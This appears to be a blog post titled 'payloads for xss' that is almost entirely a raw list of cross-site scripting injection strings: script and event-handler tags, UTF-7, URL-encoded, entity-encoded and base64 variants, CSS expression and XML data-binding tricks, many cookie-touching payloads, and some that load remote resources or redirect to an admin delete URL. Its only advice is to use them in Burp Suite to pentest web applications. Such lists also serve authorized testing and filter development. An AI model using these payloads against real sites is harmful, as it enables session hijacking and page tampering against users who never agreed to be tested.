payloads for xss

Some of payloads:

"><script>alert("321");</script>

"><img src=x onerror=prompt("1");>

"--><img src=x onerror=open('cmd')>

\\\+ADw-script+AD4-alert(/xss/)+ADw-/script+AD4---//

1c91c<img%20src%3da%20onerror%3dalert(1) >cc245622da6

>"<iframe src=http://vulnerability-lab.com/>@gmail.com

>"<script>alert(document.cookie)</script><div style="1@gmail.com

>"<script>alert(document.cookie)</script>@gmail.com

+49/>"<iframe src=http://vulnerability-lab.com>1337

"><iframe src='' onload=alert('mphone')>

<META HTTP-EQUIV="Link" Content="<http://vulnerability-lab.com/CrossSiteScripting.css>; REL=stylesheet">

<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('CrossSiteScripting')</SCRIPT>">

<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('CrossSiteScripting');+ADw-/SCRIPT+AD4-

>“<ScriPt>ALeRt("VlAb")</scriPt>

>"<IfRaMe sRc=hTtp://vulnerability-lab.com></IfRaMe>

<button.onclick="alert(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,101,114,116,40,34,67,114,111,115,115,83,105,116,101,83,99,114,105,112,116,105,110,103,6,82,69,77,79,86,69,34,41,60,47,115,99,114,105,112,116,62));">String:fr

om.Char.Code</button></body></html>

<IMG """><SCRIPT>alert("CrossSiteScripting")</SCRIPT>">

<IMG SRC="javascript:alert('CrossSiteScripting')"

<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('CrossSiteScripting')></OBJECT><STYLE>@im\port'\ja\vasc\ript:alert("CrossSiteScripting")';</STYLE>

<STYLE>@import'http://vulnerability-lab.com/CrossSiteScripting.css';</STYLE>

<STYLE TYPE="text/javascript">alert('CrossSiteScripting');</STYLE>

<STYLE>.CrossSiteScripting{background-image:url("javascript:alert('CrossSiteScripting')");}</STYLE><A CLASS=CrossSiteScripting></A>

<STYLE type="text/css">BODY{background:url("javascript:alert('CrossSiteScripting')")}</STYLE>

<STYLE>li {list-style-image: url("javascript:alert('CrossSiteScripting')");}</STYLE><UL><LI>CrossSiteScripting

<STYLE>BODY{-moz-binding:url("http://vulnerability-lab.com/CrossSiteScriptingmoz.xml#CrossSiteScripting")}</STYLE>

<A HREF="http://server.com/">CrossSiteScripting</A>

<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">CrossSiteScripting</A>

<A HREF="http://1113982867/">CrossSiteScripting</A>

<A HREF="javascript:document.location='http://www.vulnerability-lab.com/'">CrossSiteScripting</A>

\";alert('CrossSiteScripting');//

¼script¾alert(¢CrossSiteScripting¢)¼/script¾

</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

<XML ID="CrossSiteScripting"><I><B><IMG SRC="javascript:alert('CrossSiteScripting')"></B></I></XML>

<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">

<?import namespace="t" implementation="#default#time2">

<t:set attributeName="innerHTML" to="CrossSiteScripting<SCRIPT DEFER>alert("CrossSiteScripting")</SCRIPT>">

</BODY></HTML>

<? echo('<SCR)';echo('IPT>alert("CrossSiteScripting")</SCRIPT>'); ?>

Redirect 302 /vlab.jpg http://vulnerability-lab.com/admin.asp&deleteuser

%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%74%65%73%74%2E%64%65%3E

&#60&#105&#102&#114&#97&#109&#101&#32&#115&#114&#99&#61&#104&#116&#116&#112&#58&#47&#47&#116&#101&#115&#116&#46&#100&#101&#62

PGlmcmFtZSBzcmM9aHR0cDovL3Rlc3QuZGU+

<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.cookie=true</SCRIPT>">

<SCRIPT>document.cookie=true;</SCRIPT>

<SCRIPT>document.cookie=true;//<</SCRIPT>

<SCRIPT <B>document.cookie=true;</SCRIPT>

<SCRIPT>a=/CrossSiteScripting/\ndocument.cookie=true;</SCRIPT>

</TITLE><SCRIPT>document.cookie=true;</SCRIPT>

<STYLE>li {list-style-image: url("javascript:document.cookie=true;");</STYLE><UL><LI>CrossSiteScripting

¼script¾document.cookie=true;¼/script¾

<STYLE>@im\port'\ja\vasc\ript:document.cookie=true';</STYLE>

exp/*<A STYLE='no\CrossSiteScripting:noCrossSiteScripting("*//*");CrossSiteScripting:ex/*CrossSiteScripting*//*/*/pression(document.cookie=true)'>

<STYLE TYPE="text/javascript">document.cookie=true;</STYLE>

<STYLE>.CrossSiteScripting{background-image:url("javascript:document.cookie=true");}</STYLE><A CLASS=CrossSiteScripting></A>

<STYLE type="text/css">BODY{background:url("javascript:document.cookie=true")}</STYLE>

<SCRIPT>document.cookie=true;</SCRIPT>

<XML ID="CrossSiteScripting"><I><B><IMG SRC="javascript:document.cookie=true"></B></I></XML><SPAN DATASRC="#CrossSiteScripting" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>

<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="CrossSiteScripting<SCRIPT DEFER>document.cookie=true</SCRIPT>"></BODY></HTML>

<? echo('<SCR)';echo('IPT>document.cookie=true</SCRIPT>'); ?>

<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4-

&<script>document.cookie=true;</script>

&{document.cookie=true;};

<a href="about:<script>document.cookie=true;</script>">

<<script>document.cookie=true;</script>

<script>document.cookie=true;</script>

<img src="blah>" onmouseover="document.cookie=true;">

<xml id="X"><a><b><script>document.cookie=true;</script>;</b></a></xml>

<div datafld="b" dataformatas="html" datasrc="#X"></div> ]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script>

>"<meta http-equiv="refresh" content="0;url=javascript:document.cookie=true;">

>"<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.cookie=true</SCRIPT>">

>"<SCRIPT>document.cookie=true;</SCRIPT>

>"<IMG SRC="jav ascript:document.cookie=true;">

>"<IMG SRC="javascript:document.cookie=true;">

>"<IMG SRC=" javascript:document.cookie=true;">

>"<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=document.cookie=true;>

>"<SCRIPT>document.cookie=true;//<</SCRIPT>

>"<SCRIPT <B>document.cookie=true;</SCRIPT>

>"<IMG SRC="javascript:document.cookie=true;">

>"<iframe src="javascript:document.cookie=true;>

>"<SCRIPT>a=/CrossSiteScripting/\ndocument.cookie=true;</SCRIPT>

>"</TITLE><SCRIPT>document.cookie=true;</SCRIPT>

>"<INPUT TYPE="IMAGE" SRC="javascript:document.cookie=true;">

>"<BODY BACKGROUND="javascript:document.cookie=true;">

>"<BODY ONLOAD=document.cookie=true;>

>"<IMG DYNSRC="javascript:document.cookie=true;">

>"<IMG LOWSRC="javascript:document.cookie=true;">

>"<BGSOUND SRC="javascript:document.cookie=true;">

>"<BR SIZE="&{document.cookie=true}">

>"<LAYER SRC="javascript:document.cookie=true;"></LAYER>

>"<LINK REL="stylesheet" HREF="javascript:document.cookie=true;">

>"<STYLE>li {list-style-image: url("javascript:document.cookie=true;");</STYLE><UL><LI>CrossSiteScripting

>"¼script¾document.cookie=true;¼/script¾

>"<IFRAME SRC="javascript:document.cookie=true;"></IFRAME>

>"<FRAMESET><FRAME SRC="javascript:document.cookie=true;"></FRAMESET>

>"<TABLE BACKGROUND="javascript:document.cookie=true;">

>"<TABLE><TD BACKGROUND="javascript:document.cookie=true;">

>"<DIV STYLE="background-image: url(javascript:document.cookie=true;)">

>"<DIV STYLE="background-image: url( javascript:document.cookie=true;)">

>"<DIV STYLE="width: expression(document.cookie=true);">

>"<STYLE>@im\port'\ja\vasc\ript:document.cookie=true';</STYLE>

>"<IMG STYLE="CrossSiteScripting:expr/*CrossSiteScripting*/ession(document.cookie=true)">

>"<CrossSiteScripting STYLE="CrossSiteScripting:expression(document.cookie=true)">

>"exp/*<A STYLE='no\CrossSiteScripting:noCrossSiteScripting("*//*");CrossSiteScripting:ex/*CrossSiteScripting*//*/*/pression(document.cookie=true)'>

>"<STYLE TYPE="text/javascript">document.cookie=true;</STYLE>

>"<STYLE>.CrossSiteScripting{background-image:url("javascript:document.cookie=true");}</STYLE><A CLASS=CrossSiteScripting></A>

>"<STYLE type="text/css">BODY{background:url("javascript:document.cookie=true")}</STYLE>

>"<SCRIPT>document.cookie=true;</SCRIPT>

>"<BASE HREF="javascript:document.cookie=true;//">

>"<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.cookie=true></OBJECT>

>"<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:document.cookie=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

>"<XML ID="CrossSiteScripting"><I><B><IMG SRC="javascript:document.cookie=true"></B></I></XML><SPAN DATASRC="#CrossSiteScripting" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>

>"<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="CrossSiteScripting<SCRIPT DEFER>document.cookie=true</SCRIPT>"></BODY></HTML>

>"<? echo('<SCR)';echo('IPT>document.cookie=true</SCRIPT>'); ?>

>"<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4-

>"<a href="javascript#document.cookie=true;">

>"<div onmouseover="document.cookie=true;">

>"<img src="javascript:document.cookie=true;">

>"<img dynsrc="javascript:document.cookie=true;">

>"<input type="image" dynsrc="javascript:document.cookie=true;">

>"<bgsound src="javascript:document.cookie=true;">

>"&<script>document.cookie=true;</script>

>"&{document.cookie=true;};

>"<img src=&{document.cookie=true;};>

>"<link rel="stylesheet" href="javascript:document.cookie=true;">

>"<img src="mocha:document.cookie=true;">

>"<img src="livescript:document.cookie=true;">

>"<a href="about:<script>document.cookie=true;</script>">

>"<body onload="document.cookie=true;">

>"<div style="background-image: url(javascript:document.cookie=true;);">

>"<div style="behaviour: url([link to code]);">

>"<div style="binding: url([link to code]);">

>"<div style="width: expression(document.cookie=true;);">

>"<style type="text/javascript">document.cookie=true;</style>

>"<object classid="clsid:..." codebase="javascript:document.cookie=true;">

>"<style></script>

>"<<script>document.cookie=true;</script>

>"<script>document.cookie=true;//--></script>

>"<script>document.cookie=true;</script>

>"<img src="blah"onmouseover="document.cookie=true;">

>"<img src="blah>" onmouseover="document.cookie=true;">

>"<xml src="javascript:document.cookie=true;">

>"<xml id="X"><a><b><script>document.cookie=true;</script>;</b></a></xml>

>"<div datafld="b" dataformatas="html" datasrc="#X"></div> ]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script>

-1<meta http-equiv="refresh" content="0;url=javascript:document.cookie=true;">

-1<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.cookie=true</SCRIPT>">

-1<SCRIPT>document.cookie=true;</SCRIPT>

-1<IMG SRC="jav ascript:document.cookie=true;">

-1<IMG SRC="javascript:document.cookie=true;">

-1<IMG SRC=" javascript:document.cookie=true;">

-1<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=document.cookie=true;>

-1<SCRIPT>document.cookie=true;//<</SCRIPT>

-1<SCRIPT <B>document.cookie=true;</SCRIPT>

-1<IMG SRC="javascript:document.cookie=true;">

-1<iframe src="javascript:document.cookie=true;>

-1<SCRIPT>a=/CrossSiteScripting/\ndocument.cookie=true;</SCRIPT>

-1</TITLE><SCRIPT>document.cookie=true;</SCRIPT>

-1<INPUT TYPE="IMAGE" SRC="javascript:document.cookie=true;">

-1<BODY BACKGROUND="javascript:document.cookie=true;">

-1<BODY ONLOAD=document.cookie=true;>

-1<IMG DYNSRC="javascript:document.cookie=true;">

-1<IMG LOWSRC="javascript:document.cookie=true;">

-1<BGSOUND SRC="javascript:document.cookie=true;">

-1<BR SIZE="&{document.cookie=true}">

-1<LAYER SRC="javascript:document.cookie=true;"></LAYER>

-1<LINK REL="stylesheet" HREF="javascript:document.cookie=true;">

-1<STYLE>li {list-style-image: url("javascript:document.cookie=true;");</STYLE><UL><LI>CrossSiteScripting

-1¼script¾document.cookie=true;¼/script¾

-1<IFRAME SRC="javascript:document.cookie=true;"></IFRAME>

-1<FRAMESET><FRAME SRC="javascript:document.cookie=true;"></FRAMESET>

-1<TABLE BACKGROUND="javascript:document.cookie=true;">

-1<TABLE><TD BACKGROUND="javascript:document.cookie=true;">

-1<DIV STYLE="background-image: url(javascript:document.cookie=true;)">

-1<DIV STYLE="background-image: url( javascript:document.cookie=true;)">

-1<DIV STYLE="width: expression(document.cookie=true);">

-1<STYLE>@im\port'\ja\vasc\ript:document.cookie=true';</STYLE>

-1<IMG STYLE="CrossSiteScripting:expr/*CrossSiteScripting*/ession(document.cookie=true)">

-1<CrossSiteScripting STYLE="CrossSiteScripting:expression(document.cookie=true)">

-1exp/*<A STYLE='no\CrossSiteScripting:noCrossSiteScripting("*//*");CrossSiteScripting:ex/*CrossSiteScripting*//*/*/pression(document.cookie=true)'>

-1<STYLE TYPE="text/javascript">document.cookie=true;</STYLE>

-1<STYLE>.CrossSiteScripting{background-image:url("javascript:document.cookie=true");}</STYLE><A CLASS=CrossSiteScripting></A>

-1<STYLE type="text/css">BODY{background:url("javascript:document.cookie=true")}</STYLE>

-1<SCRIPT>document.cookie=true;</SCRIPT>

-1<BASE HREF="javascript:document.cookie=true;//">

-1<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.cookie=true></OBJECT>

-1<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:document.cookie=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

-1<XML ID="CrossSiteScripting"><I><B><IMG SRC="javascript:document.cookie=true"></B></I></XML><SPAN DATASRC="#CrossSiteScripting" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>

-1<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="CrossSiteScripting<SCRIPT DEFER>document.cookie=true</SCRIPT>"></BODY></HTML>

-1<? echo('<SCR)';echo('IPT>document.cookie=true</SCRIPT>'); ?>

-1<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4-

-1<a href="javascript#document.cookie=true;">

-1<div onmouseover="document.cookie=true;">

-1<img src="javascript:document.cookie=true;">

-1<img dynsrc="javascript:document.cookie=true;">

-1<input type="image" dynsrc="javascript:document.cookie=true;">

-1<bgsound src="javascript:document.cookie=true;">

-1&<script>document.cookie=true;</script>

-1&{document.cookie=true;};

-1<img src=&{document.cookie=true;};>

-1<link rel="stylesheet" href="javascript:document.cookie=true;">

-1<img src="mocha:document.cookie=true;">

-1<img src="livescript:document.cookie=true;">

-1<a href="about:<script>document.cookie=true;</script>">

-1<body onload="document.cookie=true;">

-1<div style="background-image: url(javascript:document.cookie=true;);">

-1<div style="behaviour: url([link to code]);">

-1<div style="binding: url([link to code]);">

-1<div style="width: expression(document.cookie=true;);">

-1<style type="text/javascript">document.cookie=true;</style>

-1<object classid="clsid:..." codebase="javascript:document.cookie=true;">

-1<style></script>

-1<<script>document.cookie=true;</script>

-1<script>document.cookie=true;//--></script>

-1<script>document.cookie=true;</script>

-1<img src="blah"onmouseover="document.cookie=true;">

-1<img src="blah>" onmouseover="document.cookie=true;">

-1<xml src="javascript:document.cookie=true;">

-1<xml id="X"><a><b><script>document.cookie=true;</script>;</b></a></xml>

-1<div datafld="b" dataformatas="html" datasrc="#X"></div> ]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script>

My PC Ethics

payloads for xss

Some of payloads:

use these payloads in burp suite and pentest web application.

No comments:

Facebook

Recent

Popular

Comments

More from My PC Ethics

Random Posts

Tags

My PC Ethics TEAM

My PC Ethics

payloads for xss

Some of payloads:

use these payloads in burp suite and pentest web application.

You Might Also Like

No comments:

Facebook

Recent

Popular

Comments

More from My PC Ethics

Random Posts

Tags

My PC Ethics TEAM